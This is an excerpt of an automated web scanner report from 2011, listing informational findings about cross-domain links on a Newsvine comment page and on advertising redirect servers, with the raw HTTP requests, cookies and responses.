<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://garrettb1.newsvine.com/">GarrettB</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://jbunn.newsvine.com/">jbunn</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.251. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The page was loaded from a URL containing a query string:

http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=

The response contains the following link to another domain:

http://c/

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 02:18:07 GMT
Connection: close
Set-Cookie: C2=fpMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:07 GMT; path=/
Set-Cookie: F1=B8lyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:07 GMT; path=/
Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:07 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

22.252. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The page was loaded from a URL containing a query string:

http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?

The response contains the following link to another domain:

http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 334
Date: Sun, 30 Jan 2011 02:18:09 GMT
Connection: close
Set-Cookie: C2=hpMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:09 GMT; path=/
Set-Cookie: F1=BEmyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:09 GMT; path=/
Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:09 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?">here</a>
...[SNIP]...

22.253. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHP4&AP=1455

The response contains the following links to other domains:

http://clk.redcated/CNT/go/299297287/direct;pc.106028736;wi.300;hi.120/01/
http://redcated/CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click=
http://redcated/CNT/view/299297287/direct;pc.106028736;wi.300;hi.120/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNHP4&AP=1455 HTTP/1.1
Accept: */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2442
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8325832-T38269235-C83000000000035140
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:26:36 GMT
Content-Length: 2442

//<![CDATA[
function getRADIds() { return{"adid":"83000000000035140","pid":"8325832","targetid":"38269235"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 120);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_590875532() {var adCode_590875532=new Array();adCode_590875532.push('<iframe src="http://view.atdmt.com/CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="120">\n');adCode_590875532.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_590875532.push('document.write(\'<a href="http://clk.atdmt.com/CNT/go/299297287/direct;pc.106028736;wi.300;hi.120/01/" target="_blank"><img src="http://view.atdmt.com/CNT/view/299297287/direct;pc.106028736;wi.300;hi.120/01/"/></a>
...[SNIP]...

22.254. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVNC6&AP=1025

The response contains the following links to other domains:

http://clk.redcated/BEL/go/262582811/direct;/01/
http://redcated/BEL/iview/262582811/direct;/01?click=
http://redcated/BEL/view/262582811/direct;/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVNC6&AP=1025 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2376
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8038176-T8335901-C107000000000040026
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:25 GMT
Content-Length: 2376

//<![CDATA[
function getRADIds() { return{"adid":"107000000000040026","pid":"8038176","targetid":"8335901"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2064842973() {var adCode_2064842973=new Array();adCode_2064842973.push('<iframe src="http://view.atdmt.com/BEL/iview/262582811/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="120" height="30">\n');adCode_2064842973.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_2064842973.push('document.write(\'<a href="http://clk.atdmt.com/BEL/go/262582811/direct;/01/" target="_blank"><img src="http://view.atdmt.com/BEL/view/262582811/direct;/01/"/></a>
...[SNIP]...

22.255. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026

The response contains the following link to another domain:

http://ads2.msads.net/CIS/29/000/000/000/004/822.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
